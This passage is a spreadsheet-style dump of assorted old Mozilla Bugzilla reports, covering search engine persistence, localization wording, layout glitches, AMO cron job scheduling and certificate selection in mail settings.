    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20061116 BonEcho/2.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20061116 BonEcho/2.0
When a search engine is created using addEngineWithDetails and no or an invalid icon URI is specified the parameters added later using nsISearchEngine::addEngine for this engine are not serialized to the file. This means that the created engines only work until Firefox is restarted.
Reproducible: Always
Steps to Reproduce:
1. execute this javascript code with privileges (from js console or something):
var iconURL = 
/* var iconURL = http://www.google.com/favicon.ico */
var ss = Cc[@mozilla.org/browser/search-service1]
           .getService(Ci.nsIBrowserSearchService)
var name = Google 2
ss.addEngineWithDetails(name iconURL   GET http://www.google.com/search)
var addedEngine = ss.getEngineByName(name)
addedEngine.addParam(q {searchTerms} null)
2. try the newly created engine see that it works
2. restart Firefox
3. notice that the engine does not work anymore
(check that this has something to do with the icon:)
4. delete the engine
5. execute the above code again but with the first instead of the second line commented out
6. see that the engine works even after restarting a hundred times</t>
  </si>
  <si>
    <t>moz-bugs</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-423012</t>
  </si>
  <si>
    <t>Facebook Application</t>
  </si>
  <si>
    <t>All links for Campus Reps contact need to be updated to campusreps@mozilla.com</t>
  </si>
  <si>
    <t>We have a banner/box on various FB pages that promotes the Mozilla Campus Reps program but the contact link is current setup to send Rhian a FB message.  Since she is no longer running the program we need to update that to point to campusreps@mozilla.com.
Please update the following pages:
1. http://www.facebook.com/pages/Mozilla-Firefox/14696440021 (this is perhaps our highest traffic page on FB so we definitely need to get the Campus Reps banner in the right column updated ASAP)
2. http://blog.mozilla.com/facebook (not sure who owns this or if we plan to use it but still need to update it.  if possible can someone add me as admin for this blog while you're at it?)
3. http://www.facebook.com/group.php?gid=2214598120 (which is being shutdown/migrated but still would be nice to get it updated)
Those are the only 3 places I have seen the banner.  There might be more... so please update this bug with links if you find them.</t>
  </si>
  <si>
    <t>CORE-366043</t>
  </si>
  <si>
    <t>The negative outline-offset is broken by bug 287624</t>
  </si>
  <si>
    <t>Created attachment 250593
testcase
I had a mistake in the patch of bug 287624.
If the outline-offsetis negative it is always calculated to one device pixel.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-441238</t>
  </si>
  <si>
    <t>Openfire needs a restart</t>
  </si>
  <si>
    <t>Filed bug 441237 as there's an update. If the update can be done soon then that will fix this bug otherwise we need a restart of the openfire process asap as it's starting to get quirky.
Planned hours are 1.30pm to 4.30pm PDT Monday. As always someone will be available in #livechat to confirm we're not logged in with any users.</t>
  </si>
  <si>
    <t>majken</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-248952</t>
  </si>
  <si>
    <t>New logo proposal...</t>
  </si>
  <si>
    <t>I have been working on enhancing ChatZilla with a new look.  He is my
recommendation for a logo.  This logo was designed by Lim Chee Aun of
phoenity.com based on ideas gleaned from those on the #chatzilla IRC channel.
  Comments/ideas/opinions are welcome as this will probably not be the final
version.  The URL leads to the logo.
Robin Monks</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-130474</t>
  </si>
  <si>
    <t>jvbonline.com - Juniata Valley bank says that future versions of the website will not support NS6</t>
  </si>
  <si>
    <t>When I visit Juniata Valley bank (a small bank in Central PA -- yes small banks
still exist) I am greeted with this message encouraging me to upgrade my
browser by going to 4.7.
------------
Browser Update Alert!
You are receiving this notification because the Netscape 6 Web Browser that you
are currently using will not be compatible with upcoming upgrades to Online Banking.
We encourage you to use a previous version of Netscape or another browser to
avoid problems or possible interruptions in service.
-------------
The banking system currently works but apparently in the future it may not.
This might be a bigger problem as more companies move to the mozilla codebase...
*cough*AOL*cough*</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-483223</t>
  </si>
  <si>
    <t>en-ZA / English (South Africa)</t>
  </si>
  <si>
    <t>[en-ZA] Firefox protocol handler setup for English (South Africa)</t>
  </si>
  <si>
    <t>Protocol handlers are a new feature in Firefox 3.5 that allows links like mailto:nobody@mozilla.org to be handled by a webmail application.
In order to do that the site needs to support a special API described on http://developer.mozilla.org/en/docs/Web-based_protocol_handlers.
For en-US we're currently shipping with GMail and Yahoo! Mail for mailto: and 30boxes for webcal: urls and we're on a ongoing evangelism effort to add more. We're going to add support for irc links to mibbit.com soon. For English (South Africa) we'd like to do that too.
First the localization team and Stas (Stas Malolepszy) will look at the market for the language and come up with a good candidates. Dwayne we'll need your input on this the guidelines for making recommendations are on http://wiki.mozilla.org/Firefox_web_services_guidelines. Following that is a reach out by the evangelism team to try to get the vendor to support protocol handlers.
Once that happens Stas will take over in reviewing the actual implementation which will need to change the gecko.handlerService.* entries in en-ZA/browser/chrome/browser-region/region.properties. Please don't make changes to that file without getting a positive review by Stas or somebody else appointed by Stas/Sethb on a patch for that change upfront.</t>
  </si>
  <si>
    <t>BUGZILLA-286158</t>
  </si>
  <si>
    <t>Change all use of GetSelectableProducts() into Bugzilla::User::get_selectable_products()</t>
  </si>
  <si>
    <t>We have a get_selectable_products() sub in User.pm *and* a
GetSelectableProducts() sub in globals.pl doing almost the same thing except
for the classification part. IMO we should remove the one in globals.pl and
update the one in User.pm.
The function in User.pm has been introduced by bug 186093.</t>
  </si>
  <si>
    <t>CORE-16279</t>
  </si>
  <si>
    <t>Initial installation of M10 on OpenVMS fails in LIBGTK</t>
  </si>
  <si>
    <t>Fired up browser for the first time on OpenVMS V7.2 Alpha receive the following
error:
$ @mozilla
Starting apprunner...
%DCL-W-ACTIMAGE error activating image LIBGTK
-CLI-E-IMGNAME image file DKA200:[MOZILLA]LIBGTK.SO1
-IMGACT-F-BAD_FIXUPVEC the fixup vector contains inconsistent data</t>
  </si>
  <si>
    <t>NSS-391183</t>
  </si>
  <si>
    <t>rename libPKIX error string number type to pkix error number types</t>
  </si>
  <si>
    <t>libpkix returns PKIX error message in case when it fails to build certificate chain. It is essential to convert these error messages to nss error codes to preserve backward compatibility. 
libpkix has 1200+ different error messages. Error messages(currently as char*) delivered to callers of PKIX_BuildChian/PKIX_ValidateChain as a member of PKIX_Error structure.
 53 struct PKIX_ErrorStruct {
 54         PKIX_UInt32 code
 55         PKIX_Error *cause
 56         PKIX_PL_Object *info
 57         PKIX_PL_String *desc
 58 }
The fix for this bug should change the way an error info is stored. We should abandon the use of string to store error codes. So *desc from PKIX_Error should be replace to something for suitable for the library. Instead of PKIX_PL_String* an error code (or better a pointer to PL layer error object allocated when a particular error has occurred) should be used.
Also if possible extend and use nss error codes instead of pkix error codes. If the last one is not achievable come up with a function that will converter libpkix codes to nss codes.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-357530</t>
  </si>
  <si>
    <t>Remove dead code from DraggableImageAndTextCell</t>
  </si>
  <si>
    <t>DraggableImageAndTextCell has a bunch of dead code and API for the dead code that makes it look as though the class has capabilities it doesn't.  The code has been dead since at least the merge from the Chimera branch in 2002 and there's a live version of this stuff in TruncatingImageAndTextCell so there doesn't seem to be any downside to removing it.</t>
  </si>
  <si>
    <t>CORE-263966</t>
  </si>
  <si>
    <t>Table is incorrectly placed jumps when browser window is resized</t>
  </si>
  <si>
    <t>Linux build 2004101106
To reproduce:
1. Open provided URL
2. Notice that table at right is placed lower than supposed
3. Slightly resize broser window and notice that the table jumps to correct position</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-359451</t>
  </si>
  <si>
    <t>Tinderbox overuses globals</t>
  </si>
  <si>
    <t>A lot of the common tinderbox functions use global variables and/or require treedata.pl.  This can lead to unintended corruption of the variables and performance issues like we see in bug 359323.  We should begin the process of removing the globals and explicitly passing references to functions as needed and make them reentrant.</t>
  </si>
  <si>
    <t>CORE-332499</t>
  </si>
  <si>
    <t xml:space="preserve">Misplaced listbox for floated </t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 sv-SE rv:1.9a1) Gecko/20060401 Firefox/1.6a1
The dropdown menu for a floated  opens in the wrong position. This happens with both cairo and non-cairo builds.
Steps to reproduce:
1. Open the attached testcase.
2. Click on the select box.
Actual result:
The dropdown menu opens to the left.
This regressed between builds 2006-03-26-07 and 2006-03-27-05.
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=PhoenixTinderbox&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2006-03-26+06%3A00%3A00&amp;maxdate=2006-03-27+05%3A00%3A00&amp;cvsroot=%2Fcvsroot</t>
  </si>
  <si>
    <t>marcldl+mozbugs</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-492883</t>
  </si>
  <si>
    <t>Add JavaScript Error Console to Fennec</t>
  </si>
  <si>
    <t>Created attachment 377285
screen shot
also it goes away if you switch between portrait and landscape modes</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-171769</t>
  </si>
  <si>
    <t>[ActiveX] DOM - implement put_InnerHTML and a other simple methods</t>
  </si>
  <si>
    <t>Implement put_innerHTML &amp; investigate IHTMLDocument3. Also investigate why
get_Body might not be returning a valid object.</t>
  </si>
  <si>
    <t>CORE-333613</t>
  </si>
  <si>
    <t>update canvas on branch</t>
  </si>
  <si>
    <t>Two bits of functionality that we should give to web developers on the branch:
1. toDataURL bits
   - bug 245684 (add image encoder support)
   - bug 291218 (toDataURL)
   - bug 293244 (security checks)
2. canvas speedup and API fixes
   - bug 333177</t>
  </si>
  <si>
    <t>BUGZILLA-166023</t>
  </si>
  <si>
    <t>On failure in template-&gt;new a template is used to display error</t>
  </si>
  <si>
    <t>Bugs such as bug 165133 show failures in checksetup that derive from the fact
that globals.pl uses DisplayError() to show errors in Template-&gt;new  
Since DisplayError() will never work if Template-&gt;new fails this should be a
die() instead.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-359084</t>
  </si>
  <si>
    <t>rustico: some ugly excess platform text when viewing an add-on that's not available for your platform</t>
  </si>
  <si>
    <t>There's the for Linux and for Windows stuff right before the Image Assistant is not available for MacOSX text and I think there shouldn't be.  Probably some id change that didn't get tracked in the fixPlatformText JS.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-204880</t>
  </si>
  <si>
    <t>business-ethics.com - page is un-readable</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
all of the blue text on the web page overlaps
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>sms043</t>
  </si>
  <si>
    <t>CORE-450538</t>
  </si>
  <si>
    <t>TM: crash on olympic.org</t>
  </si>
  <si>
    <t>Created attachment 333690
trace + gdb dump
jquery.js -- I've never seen jQuery but that might be it.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-395648</t>
  </si>
  <si>
    <t>Diskette/Festplatte is outdated</t>
  </si>
  <si>
    <t>An ein paar Stellen der Ãœbersetzung wird von Diskette/Festplatte im Sinne von DatentrÃ¤ger gesprochen. Ich habe darÃ¼ber mit Abdulkadir in der Vergangenheit bereits diskutiert ob man das abÃ¤ndern soll. Wir haben es letztlich immer vor uns her geschoben da wir nicht Ã¼ber eine aktuellere Begrifflichkeit einig wurden.
Ich persÃ¶nlich finde schlichtweg DatentrÃ¤ger gut. Abdulkadir meinte aber dass dies nicht fÃ¼r jeden DAU verstÃ¤ndlich sei. In Zeiten von USB-Sticks Flash-Cards CDs DVDs etc. sollte man IMHO aber nicht mehr nur von Diskette/Festplatte sprechen. Theoretisch wÃ¤re sogar ein DatentrÃ¤ger im Netzwerk LAN/WAN mÃ¶glich als Zeil zum Speichern von irgendwas.
Ich gebe hier mal die Fundstellen fÃ¼r Diskette im Trunk an:
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\browser\chrome\browser\preferences\changeaction.dtd':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\browser\chrome\browser\preferences\changeaction.dtd(12): 
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\browser\chrome\browser\preferences\preferences.properties':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\browser\chrome\browser\preferences\preferences.properties(56): saveToDisk=Auf Diskette/Festplatte speichern
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\browser\chrome\help\prefs.xhtml':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\browser\chrome\help\prefs.xhtml(223):     Dateien auf Diskette/Festplatte speichern:
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\browser\chrome\help\using_firebird.xhtml':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\browser\chrome\help\using_firebird.xhtml(517):   Auf Diskette/Festplatte speichern:  erlaubt es 
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\dom\chrome\nsWebBrowserPersist.properties':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\dom\chrome\nsWebBrowserPersist.properties(41): diskFull=Nicht genug Speicherplatz auf der Festplatte/Diskette um %S zu speichern.\n\nEntfernen Sie unnÃƒÆ’Ã‚Â¶tige Dateien von der Festplatte/Diskette und versuchen Sie es nochmals oder versuchen Sie das Speichern an einem anderen Ort.
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\dom\chrome\nsWebBrowserPersist.properties(42): readOnly=%S konnte nicht gespeichert werden weil die Festplatte/Diskette der Ordner oder die Datei schreibgeschÃƒÆ’Ã‚Â¼tzt ist.\n\nLÃƒÆ’Ã‚Â¶sen Sie bitte den Schreibschutz und versuchen Sie es nochmals oder versuchen Sie in einen anderen Ordner zu speichern.
'Diskette' wurde 3-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\mail\chrome\messenger\preferences\preferences.properties':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\mail\chrome\messenger\preferences\preferences.properties(48): saveToDisk=Auf Diskette/Festplatte speichern
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\security\manager\chrome\pipnss\pipnss.properties':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\security\manager\chrome\pipnss\pipnss.properties(328): ForcedBackup3=Um eine Kopie zu erstellen klicken Sie OK. Wenn mÃƒÆ’Ã‚Â¶glich sollten Sie Ihre Sicherungskopie auf einer Diskette speichern die Sie an einem sicheren Ort aufbewahren.
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\suite\chrome\common\help\cs_nav_prefs_navigator.xhtml':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\suite\chrome\common\help\cs_nav_prefs_navigator.xhtml(254):                 Auf Diskette/Festplatte sichern: Die Datei
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\suite\chrome\common\help\nav_help.xhtml':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\suite\chrome\common\help\nav_help.xhtml(1344):   Diese Datei auf Diskette/Festplatte speichern:
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\suite\chrome\common\pref\pref-applications-edit.dtd':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\suite\chrome\common\pref\pref-applications-edit.dtd(15): 
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\suite\chrome\common\pref\pref-applications.properties':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\suite\chrome\common\pref\pref-applications.properties(3): saveToDisk=Diese Dateien auf Diskette/Festplatte speichern
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\toolkit\chrome\global\nsHelperAppDlg.dtd':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\toolkit\chrome\global\nsHelperAppDlg.dtd(26): 
'Diskette' wurde 1-mal gefunden.
----------------------------------------
Suche 'Diskette' in 'E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\toolkit\chrome\mozapps\downloads\unknownContentType.dtd':
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\toolkit\chrome\mozapps\downloads\unknownContentType.dtd(48): 
E:\Thunderbird-Material\Thunderbird_CVS\moz_trunk\.\l10n\de\toolkit\chrome\mozapps\downloads\unknownContentType.dtd(65): 
'Diskette' wurde 2-mal gefunden.
Suche abgeschlossen 'Diskette' wurde 16-mal gefunden (13 Datei(en)).</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-440808</t>
  </si>
  <si>
    <t>Need to get the current graph server schema checked in</t>
  </si>
  <si>
    <t>We don't know what the current schema is so we need to get that attached here (sans data) and get it checked into Hg.
I can also create a diagram showing the overall schema in a graph.</t>
  </si>
  <si>
    <t>CORE-118954</t>
  </si>
  <si>
    <t>Printing page setup uses inches for margins in a metric world</t>
  </si>
  <si>
    <t>In printing page setup you can specify margins but only in inches. This is way
unhandy if you live in this little metric part of the world here. The dialog
should adapt to the OS settings and support cm or mm as unit.
I think the issue about standard page size is reported elsewhere (should be A4 here)</t>
  </si>
  <si>
    <t>CORE-525363</t>
  </si>
  <si>
    <t>clipPath winding mode broken</t>
  </si>
  <si>
    <t>TOOLKIT-403180</t>
  </si>
  <si>
    <t>test_378216.js is asserting but after printing PASS (so the test passes)</t>
  </si>
  <si>
    <t>Our success condition for a test passing is that PASS is in its output but if a test passes and then asserts it should fail.  (There's a bug on file Core:Testing somewhere.)  This test looks like it's being bitten by this problem I haven't investigated to see exactly what's wrong with it.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-202810</t>
  </si>
  <si>
    <t>tippecanoe.in.us - URL contains \ (backslash) at CourtView Online</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030411 Phoenix/0.5+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030411 Phoenix/0.5+
must be Netscape 6.2 compatible is there a fix for this ?
The page will not load into the Court records search site error 404
Reproducible: Always
Steps to Reproduce:
1.log onto site
2. hit public access
3.error 404 
Actual Results:  
error 404 page will not load
Expected Results:  
brought up court records search screen</t>
  </si>
  <si>
    <t>jhoon</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-269315</t>
  </si>
  <si>
    <t>qualitia.com.mx - invalid CSS height usage breaks layout</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
the text overlap
Reproducible: Always
Steps to Reproduce:
1. just connect to the url
2.
3.</t>
  </si>
  <si>
    <t>patarchy</t>
  </si>
  <si>
    <t>BUGZILLA-351178</t>
  </si>
  <si>
    <t>WebService needs to be able to provide the server's timezone</t>
  </si>
  <si>
    <t>Because all the times we send back are in the server's timezone we need a way to send back our timezone in some standard format so that people know what date format they're actually getting.
Probably we could send it in the GMT-0800 or GMT+0800 format since I think that works for all time zones.</t>
  </si>
  <si>
    <t>CORE-321065</t>
  </si>
  <si>
    <t>memory leak in nsJSNPRuntime.cpp</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.8) Gecko/20051211 Firefox/1.5
Build Identifier: Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.8) Gecko/20051211 Firefox/1.5
In modules/plugin/base/src/nsJSNPRuntime.cpp there exists a potential memory leak in the function CallNPMethod. When converting arguments from JSVal to NPVariant if it fails the function will just return false. Actually the memory allocated for npargs should be freed.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>TOOLKIT-298046</t>
  </si>
  <si>
    <t>XRE_PROFILE_TEMP_PATH should be XRE_PROFILE_LOCAL_PATH</t>
  </si>
  <si>
    <t>XRE_PROFILE_TEMP_PATH should be XRE_PROFILE_LOCAL_PATH.
It is in all but one place in nsAppRunner.cpp.   Oops!</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-251015</t>
  </si>
  <si>
    <t>Extension update: mozImage 0.9.0</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.8
Extension name: mozImage
Version: 0.9.0
Description: The goal of mozImage is to create a simple image browser based on
the Mozilla Framework. It has a simple and fast user interface.
Home page URL: http://mozimage.mozdev.org/
XPI URL: http://downloads.mozdev.org/mozimage/mozimage.xpi
Target Application: Firefox 0.8-0.9+ and MozillaBrowser 1.4+
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>lithian</t>
  </si>
  <si>
    <t>FIREFOX-395446</t>
  </si>
  <si>
    <t>if the user chooses a result from autocomplete results or types it manually have that weigh heavily in ranking ac results</t>
  </si>
  <si>
    <t>if the user chooses a result from autocomplete have that weigh heavily in ranking ac results.
not we have a bug on typed weighing more already which would be easiy to fix and good to do for m8.
 btw you mentioned poor man's quicksilver
 I have an idea there
 when we get around to frecency ratings calculated at load time we should make stuff picked out of the autocomplete jump the rating a lot
 so if I keep picking foo.com out of the autocomplete results I should get that high in the list for anything matching
 which is kinda/sorta how quicksilver learns
 though it remembers fo == foo.com rather than just making foo.com rate higher for anything matching
 there is a bug about using typed as the high order bit and i need to see if we set visits at typed when we click on them ac results.
 say we do (or we don't) we could have that as a transition type
 and make those weigh more
 typed or chosen</t>
  </si>
  <si>
    <t>SEAMONKEY-243894</t>
  </si>
  <si>
    <t>Closing special startup windows causes Error: uncaught exception: [Exception... Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIControllers.removeController]  location: JS frame :: chrome://navigator/content/navigator.js :: Shutdo...</t>
  </si>
  <si>
    <t>Error: uncaught exception: [Exception... Component returned failure code:
0x80004005 (NS_ERROR_FAILURE) [nsIControllers.removeController]  nsresult:
0x80004005 (NS_ERROR_FAILURE)  location: JS frame ::
chrome://navigator/content/navigator.js :: Shutdown :: line 736  data: no]
at startup i create one or two special windows which have the wrong icon
(mozilla instead of navigator) and which don't really work correctly. when i
close them i get that error.</t>
  </si>
  <si>
    <t>CORE-478512</t>
  </si>
  <si>
    <t>TM: trace prop retrieving undefined properties</t>
  </si>
  <si>
    <t>We currently fall of trace if prop hits an undefined property case. Instead guard on the shape of the object and the shape of each object in its prototype chain. This case seems to happen a lot in certain poorly written benchmark codes.</t>
  </si>
  <si>
    <t>CORE-468353</t>
  </si>
  <si>
    <t>designmode.css is not removed after designMode is turned off</t>
  </si>
  <si>
    <t>Offshoot from bug 440614. That may take longer and it's really annoying to have this in the diffs.</t>
  </si>
  <si>
    <t>mike.kaplinskiy</t>
  </si>
  <si>
    <t>TESTING-705192</t>
  </si>
  <si>
    <t>XPCShell Harness</t>
  </si>
  <si>
    <t>remotexpcshelltests.py cannot execute xpcshell via SUT agent</t>
  </si>
  <si>
    <t>remotexpcshelltests.py uses devicemanager.runCmd to execute xpcshell but runCmd is not implemented in devicemanagerSUT.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-40601</t>
  </si>
  <si>
    <t>RDFServiceImpl::GetUnicodeResource does wrong munging</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.72 [en] (WinNT U)
BuildID:    All
RDFServiceImpl::GetUnicodeResource munges non-ascii non-latin1 unicode uris by 
changing every char &gt; 255 to a '.'. This is problematic. We should instead do 
the munging by converting from Unicode to a UTF8 string. Otherwise many Intl 
uris will all map to the same resource inadvertently. 
Reproducible: Always
Steps to Reproduce:
1. Do GetUnicodeResource for two different Japanese PRUnichar* uris. 
2. They will likely map to the same resource even if they are very different. 
Actual Results:  This means that we cannot use Japanese group names in Instant 
Messenger (unless we do some ugly UTF-8 mangling in our code instead). The right 
place for that to be done is in RDF itself as other people can hit this too in 
the future.</t>
  </si>
  <si>
    <t>vishy</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-516619</t>
  </si>
  <si>
    <t>Redirect mozilla.org/lightning to http://www.mozilla.org/projects/calendar/</t>
  </si>
  <si>
    <t>sarah</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-529413</t>
  </si>
  <si>
    <t>[AMO] Adjust timing of AMO cron jobs again please</t>
  </si>
  <si>
    <t>We need to buy some time until Hudson is setup and we start doing incremental updates instead of complete updates.  Please adjust the AMO cron jobs on preview and production as below spacing out the cron jobs as much as you can. 
Run once an hour:
php -f maintenance.php collection_stats
php -f maintenance.php blog
php -f update-search-views.php
Run every 3 hours:
php -f compatibility_report.php
Run twice per day:
php -f maintenance.php addons_collections_total
php -f maintenance.php collections_total
/usr/bin/python26 maintenance.py collections_ratings
/usr/bin/python26 import-personas.py
Run once per day:
php -f maintenance.php reviews
php -f maintenance.php ratings
php -f maintenance.php gc
php -f maintenance.php expired_resetcode
php -f maintenance.php category_totals
php -f maintenance.php collection_subscribers
php -f maintenance.php user_ratings
/usr/bin/python26 build-recommendations.py
/usr/bin/python26 maintenance.py share_count_totals
/usr/bin/python26 maintenance.py personas_adu
Run once per day after 2100 PST (that's after metrics is done):
/usr/bin/python26 maintenance.py total
/usr/bin/python26 maintenance.py weekly
php -f maintenance.php global_stats
/usr/bin/python26 maintenance.py addons_adu
Run once per week:
php -f maintenance.php unconfirmed
--------------------------------------------------
It occurs to me that storing the crontab in SVN would be a lot easier than filing these bugs.  Would it be easy on your end to just run `crontab -u /data/remora/..../crontab`?  If so I can cook up another bug for that.</t>
  </si>
  <si>
    <t>CORE-454857</t>
  </si>
  <si>
    <t>Disable (intermittently failing) test_loadflags.html for now</t>
  </si>
  <si>
    <t>Most recent failure
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1221156177.1221160039.27833.gz&amp;fulltext=1#err0
I'm going to Disable it for now per bug 421494 comment #37</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-370610</t>
  </si>
  <si>
    <t>Search Plugins</t>
  </si>
  <si>
    <t>Offered search plugin in remora not working</t>
  </si>
  <si>
    <t>Try to install the offered search plugin / engine from the remora page. An error message pops up Error during downloading search engine by: Firefox (translated).</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-373683</t>
  </si>
  <si>
    <t>Use of htmlentities should be separated into a wrapper</t>
  </si>
  <si>
    <t>Use of ENT_QUOTES vs. ENT_NOQUOTES has showed us that direct calls to htmlentities should be replaced by a call to a wrapper (or use the sanitize func in Cake's sanitize helper instead): http://api.cakephp.org/sanitize_8php-source.html#l00084</t>
  </si>
  <si>
    <t>CORE-188153</t>
  </si>
  <si>
    <t>onmouseover not working</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3a) Gecko/20030107 Phoenix/0.5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3a) Gecko/20030107 Phoenix/0.5
Onmouseover doesn't work on the www.nvidia.com web page I recall they were
working sometimes in December.. According to people on Mozillazine it is
working in Windows versions of Phoenix but not in Linux.
Moving mouse over the top menu on nvidia.com displays only thin black line below
the menu but not the menu itself - using 20030107 nightly.  With 20030106
nightly the menu was displayed but could not be pointed on (disappears when
trying to point on it).
Reproducible: Always
Steps to Reproduce:
1.open www.nvidia.com
2.try to open the upper menu
3.
Actual Results:  
the menu contents are not displayed
Expected Results:  
the menu contents should be displayed</t>
  </si>
  <si>
    <t>mehturt</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-278689</t>
  </si>
  <si>
    <t>Multiple Certificates with the same subject are not shown in the digital signature select cert combo (only one is shown)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041111 Firefox/1.0 (JTw)
Build Identifier: 
If you have two different certificates (from the same or different CAs doesn't
matter) with the same subject both of them show up in the certificate manager
dialog under personal certificates. However only one is available in Mail &amp;
NewsGroup Account Settings\Security\Digital signing\certificate select combo.
Both are valid certificates. If I only import one of them I am able to sign a
mail with it.
Since certificates in the NewsGroup Account Settings\Security\Digital
signing\certificate select combo are postfixed by the serial number I would
